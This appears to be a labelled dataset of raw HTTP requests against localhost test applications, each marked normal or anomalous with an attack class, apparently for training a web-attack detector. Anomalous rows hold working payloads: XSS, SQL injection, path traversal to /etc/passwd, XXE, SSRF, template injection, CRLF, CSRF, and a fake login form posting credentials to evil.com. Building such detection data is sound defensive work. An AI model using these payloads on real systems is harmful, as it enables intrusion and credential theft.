Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=40E8889AD80C4081266BDDFDCB557D9D
Host: localhost
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 72
id=%3Cdetails%20src%3Dx%20onabort%3Dparent.alert%281%29%3E&submit=Submit | anomalous | Cross-Site_Scripting |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=AA53745DC7FC18C6DA674D43820AB41B
Host: localhost
Content-Type: application/json
Connection: close
Content-Length: 409
{"id": "<form action=\"https://evil.com/steal\" style=\"position:fixed;top:19%;left:21%;background:white;padding:30px;border:4px solid red;z-index:999999;box-shadow:0 0 20px red;\"><h2>Session Expired</h2>Username: <input name=\"uy2NH\"><br><br>Password: <input type=\"password\" name=\"ph8Rd\"><br><br><button style=\"background:red;color:white;padding:10px;\">Login Now</button></form>", "action": "search"} | anomalous | HTML_Injection |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=31EAFA5BA789587253DAD942933F1AA8
Referer: http://malicious.com/<form action="/api/v1/user/update?" method="PUT"><input type="hidden" name="authenticity_token" value="delete"><input type="hidden" name="to_account" value="root%3Cscript%3E"><input type="image" src="x">
Host: localhost
Connection: close | anomalous | Cross-Site_Request_Forgery |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=302BF45811B5ADD422666E4B657510A3
Host: localhost
Content-Type: application/json
Connection: close
Content-Length: 87
{"id": "'<svg onload=setTimeout(`eval(atob('YWxlcnQoMSk='))`,0)>'", "action": "search"} | anomalous | Cross-Site_Scripting |
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low%29%29%29%20AND%20%28SELECT%20%28CASE%20WHEN%20%282147%3D5746%29%20THEN%20NULL%20ELSE%20CTXSYS.DRITHSX.SN%281%2C2147%29%20END%29%20FROM%20DUAL%29%20IS%20NULL%20AND%20%28%28%281428%3D1428
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15
Referer: http://localhost/vulnerabilities/sqli/
Host: localhost
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL Injection |
GET /vulnerabilities/sqli/?id=<input type="text" value=``<div/onmouseover='alert(1)'>X</div> HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=04DC5454021C104A88F48196EDDE695F
Host: localhost
Connection: close | anomalous | Cross-Site_Scripting |
GET /vulnerabilities/sqli/?id=http://XY>.7d8T\205pZM@472.314.470.462 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=B4DEFE00EB895849E075C85240D40E6B
Host: localhost
Connection: close | anomalous | Open_Redirect |
GET /user/login HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Connection: close
Accept-Encoding: gzip | anomalous | Advanced Vulnerability Scan |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=D765729712840BCA7687E552539D5555
Referer: http://malicious.com/'"<math><mi xlink:href="javascript:[]['find'][`$print()`]">click</mi></math>"'
Host: localhost
Connection: close | anomalous | Cross-Site_Scripting |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: ..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8sboot.ini
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=17899E00216A9F0A87DE28813F413F07
Host: localhost
Connection: close | anomalous | Directory_Traversal |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 0e75abd5-6f40-4742-ae47-2632bf64c744 | normal | null |
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low%27%29%29%20AS%20GZIr%20WHERE%202104%3D2104%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20KhYh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15
Referer: http://localhost/vulnerabilities/sqli/
Host: localhost
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL Injection |
GET /search?q=lemon HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:89.0) Gecko/89.0 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Referer: http://127.0.0.1:3000/products | normal | null |
GET /rest/products/search?q=cup&cache_id=ddc29ca2-534c-4cca-80c7-40a60422e8ed HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: ddc29ca2-534c-4cca-80c7-40a60422e8ed | normal | null |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 50b43059-1104-4c59-bc6c-bff4e401a755 | normal | null |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=E68329B379A2C52954504AC09D9C7485
Host: localhost
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 155
id=%25c0%25ee%25c0%25ee%25c0%255c%25c0%25ee%25c0%25ee%25c0%255c%25c0%25ee%25c0%25ee%25c0%255c%25c0%25ee%25c0%25ee%25c0%255cetc%25c0%255cissue&submit=Submit | anomalous | Directory_Traversal |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=AB66DBDADF9A32005D418F8225170327
Host: localhost
Content-Type: application/xml
Connection: close
Content-Length: 117
<?xml version="1.0" encoding="UTF-8"?>
<user>
<id>' UNION SELECT 1,@@version#</id>
<name>admin</name>
</user> | anomalous | SQL_Injection |
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low%2C%28SELECT%20%28CASE%20WHEN%20%287573%3D7573%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20ELSE%201%2F%28SELECT%200%29%20END%29%29
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15
Referer: http://localhost/vulnerabilities/sqli/
Host: localhost
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=0B10FC75AD39C6423ACD581851F93A96
Host: localhost
Content-Type: application/xml
Connection: close
Content-Length: 301
<?xml version="1.0" encoding="UTF-8"?>
<user>
<id><script>document.location="/update-profile%09?<input type="text" name="destination" value="eviluser"><input type="text" name="token" value="yes//"><input type="text" name="user_id" value="password123">"</script></id>
<name>admin</name>
</user> | anomalous | Cross-Site_Request_Forgery |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=01C51A8F3D77AC892345A6DBDD02CAA1
Host: localhost
Content-Type: application/json
Connection: close
Content-Length: 141
{"id": "%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fpasswd", "action": "search"} | anomalous | Directory_Traversal |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=EA09F66472BBF8906682E38E6BC74526
Host: localhost
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 110
id=%7B%7B%20%7B%7B%20joiner.__init__.__globals__.os%20%7D%7D/%2A%20comment%20%2A/%20%7D%7D%7D%7D&submit=Submit | anomalous | Server-Side_Template_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: cadcbd28-9190-497d-93d3-36ff7483511e | normal | null |
POST /login/system HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Content-Length: 52
Content-Type: application/json
Accept-Encoding: gzip
Connection: close
{"name":"admin","password":"admin","checkbox":false} | anomalous | Advanced Vulnerability Scan |
GET /rest/products/search?q=%74%65%73%74%7C%7C%28%2F%2A%21%53%65%4C%65%63%74%2A%2F%43%68%72%28%37%39%29%7C%7C%43%68%72%28%31%30%30%29%7C%7C%43%68%72%28%31%30%38%29%7C%7C%43%68%72%28%31%31%31%29%2F%2A%21%66%52%6F%4D%2A%2F%2F%2A%21%64%55%41%6C%2A%2F%2F%2A%21%77%68%65%52%45%2A%2F%34%34%39%39%3D%34%34%39%39%2F%2A%21%61%4E%64%2A%2F%38%33%36%30%2F%2A%21%62%65%74%77%45%45%6E%2A%2F%43%54%58%53%59%53%2F%2A%21%61%4E%64%2A%2F%43%54%58%53%59%53%2E%44%52%49%54%48%53%58%2E%73%4E%28%38%33%36%30%2C%28%43%68%72%28%31%31%33%29%7C%7C%43%68%72%28%31%31%32%29%7C%7C%43%68%72%28%39%38%29%7C%7C%43%68%72%28%31%30%37%29%7C%7C%43%68%72%28%31%31%33%29%7C%7C%28%2F%2A%21%53%65%4C%65%63%74%2A%2F%28%2F%2A%21%43%61%53%65%2A%2F%2F%2A%21%57%68%65%6E%2A%2F%28%38%33%36%30%3D%38%33%36%30%29%2F%2A%21%74%48%65%4E%2A%2F%31%2F%2A%21%65%4C%73%45%2A%2F%30%2F%2A%21%45%6E%64%2A%2F%29%2F%2A%21%66%52%6F%4D%2A%2F%2F%2A%21%64%55%41%6C%2A%2F%29%7C%7C%43%68%72%28%31%31%33%29%7C%7C%43%68%72%28%39%38%29%7C%7C%43%68%72%28%31%31%32%29%7C%7C%43%68%72%28%31%32%32%29%7C%7C%43%68%72%28%31%31%33%29%29%29%29%7C%7C HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0
Referer: http://localhost:3000/rest/products/search
Host: localhost:3000
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL Injection |
GET /vulnerabilities/sqli/?id=<div style='display:none;'><form action="/delete-account" method="DELETE"><input type="hidden" name="authenticity_token" value="hacker%40evil.com'"><input type="hidden" name="user_id" value="promote"><input type="hidden" name="currency" value="admin"><input type="hidden" name="currency60" value="-999999"><input type="image" src="x"></div> HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=2B3E366116E6F064122E64E2791CF3A5
Host: localhost
Connection: close | anomalous | Cross-Site_Request_Forgery |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 4bd30bd6-c004-489a-92d3-7d5eea56eb71 | normal | null |
GET /defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip | anomalous | Advanced Vulnerability Scan |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=95E55CB4BD7E860B54F1DF8326E0D075
Referer: http://malicious.com/<?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY blind SYSTEM "file:////file:///C:/xampp/php/php.ini"> ]><user>&blind;</user>
Host: localhost
Connection: close | anomalous | XML_External_Entity |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: file://2130706433:3389
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=657C38E193C7643FDABD875F3EB505D1
Host: localhost
Connection: close | anomalous | Server-Side_Request_Forgery |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: bd73c316-2e62-492a-8f2a-ad31b9272cd3 | normal | null |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=70F6CEA067C5723EE4DB89CAEE752B81
Referer: http://malicious.com/..../%c0%2f..../%c0%2fetc%c0%2fissue
Host: localhost
Connection: close | anomalous | Directory_Traversal |
GET /?ref=035e2a08-03df-45cb-9ffa-a26a5c8b6422&session_token=9549 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 035e2a08-03df-45cb-9ffa-a26a5c8b6422 | normal | null |
GET /rest/products/search?q=$comment: 'MongoDB injection' // HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=95AFD2066BAE9E6FCA24100A920192B9
Host: localhost:3000
Connection: close | anomalous | NoSQL_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: a6e9a74f-fef0-4f4a-a503-c12075e53352 | normal | null |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=B58AC476916051DD74420B7E4EEB6A39
Host: localhost
Content-Type: application/xml
Connection: close
Content-Length: 189
<?xml version="1.0" encoding="UTF-8"?>
<user>
<id>%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qf%fc%80%80%80%80%ae%fc%80%80%80%80%ae%c0%qfetc%c0%qfpasswd</id>
<name>admin</name>
</user> | anomalous | Directory_Traversal |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: eb979361-4967-4b3f-997f-dd461e43d2d4 | normal | null |
GET /rest/products/search?q=/././+%0d%0a%20Set-Cookie:crlf=injection; Path=/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=1AD85B8FBD5899E045D9DFF1C19E7C8E
Host: localhost:3000
Connection: close | anomalous | CRLF_Injection |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=56A047B56BC62CDC02DE428DB93E690E
Referer: http://malicious.com/<form action="/admin/user/promotejavascript:" method="DELETE"><input type="hidden" name="amount" value="yes
Host: localhost
Connection: close | anomalous | Cross-Site_Request_Forgery |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: C:\logs\error_log
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=D7BFB40B584B7268775C549549B9B8FD
Host: localhost
Connection: close | anomalous | Local_File_Inclusion |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=B22C6750A37286EFEBC7C39F0017B776
Host: localhost
Content-Type: application/json
Connection: close
Content-Length: 46
{"id": "\\..//etc/passwd", "action": "search"} | anomalous | Local_File_Inclusion |
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15';BEGIN DBMS_LOCK.SLEEP(5); END AND 'tYdV'='tYdV
Referer: http://localhost/vulnerabilities/sqli/
Host: localhost
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: bac6de8c-0158-443e-b363-8427e141a332 | normal | null |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: b3b273e3-9c00-4bd8-91c6-19077ae229b7 | normal | null |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 98df462c-7b56-4b5d-934f-0054b39ae7fc | normal | null |
GET /rest/products/search?q=gopher://127.1:8080/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Cookie: JSESSIONID=627EC6C1F722AFD618E7F9B1A90E0C43
Host: localhost:3000
Connection: close | anomalous | Server-Side_Request_Forgery |
GET /portal/info.jsp HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip | anomalous | Advanced Vulnerability Scan |
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1%27%20IN%20BOOLEAN%20MODE%29%20OR%20EXTRACTVALUE%281465%2CCONCAT%280x5c%2C0x717a6a7171%2C%28SELECT%20%28ELT%281465%3D1465%2C1%29%29%29%2C0x717a6b7871%29%29%23; security=low
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15
Referer: http://localhost/vulnerabilities/sqli/
Host: localhost
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close | anomalous | SQL Injection |
GET /rest/products/search?q=glass&cache_id=ec2b3610-cdea-46ce-8a5a-5a93513c0310 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: ec2b3610-cdea-46ce-8a5a-5a93513c0310 | normal | null |
POST /vulnerabilities/sqli/ HTTP/1.1
